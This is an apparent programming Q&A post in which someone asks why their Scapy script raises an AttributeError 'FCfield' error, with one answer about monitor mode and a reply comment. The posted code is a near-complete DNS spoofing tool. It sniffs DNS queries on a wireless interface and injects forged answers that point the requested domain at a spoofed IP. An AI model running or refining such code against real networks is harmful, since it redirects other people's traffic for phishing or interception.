# FCfield Attribut error while sniffing packets using Scapy

Tags: python, networking, scapy, spoofing

I tried to sniff DNS request packets on mon0 interface, using scapy.
I wanted to send back a spoofed IP. 
But I get an error:

> AttributeError: 'Ether' object has no attribute 'FCfield'

Code:

```
def send_response(x):
x.show()
req_domain = x[DNS].qd.qname
logger.info('Found request for ' + req_domain)
# First, we delete the existing lengths and checksums..
# We will let Scapy re-create them
del(x[UDP].len)
del(x[UDP].chksum)
del(x[IP].len)
del(x[IP].chksum)
response = x.copy()
response.FCfield = '2L'

response.addr1, response.addr2 = x.addr2, x.addr1
# Switch the IP addresses
response.src, response.dst = x.dst, x.src
# Switch the ports
response.sport, response.dport = x.dport, x.sport
# Set the DNS flags
response[DNS].qr = '1L'
response[DNS].ra = '1L'
response[DNS].ancount = 1


response[DNS].an = DNSRR(
    rrname = req_domain,
    type = 'A',
    rclass = 'IN',
    ttl = 900,
    rdata = spoofed_ip
    )
#inject the response
sendp(response)
logger.info('Sent response: ' + req_domain + ' -> ' + spoofed_ip + '\n')

def main():
    logger.info('Starting to intercept [CTRL+C to stop]')
    sniff(prn=lambda x: send_response(x), lfilter=lambda x:x.haslayer(UDP) and x.dport == 53)
```

Answer (score 0):

Your interface is probably not configured in monitor mode, that's why you get an ethernet (`Ether`) layer, and not a WiFi (`Dot11`) layer.

Comment: I did enable monitor mode on wireless interface before running the code:
`Interface Chipset  Driver

wlp6s0     Intel AC   iwlwifi - [phy0]
    (monitor mode enabled on mon0)`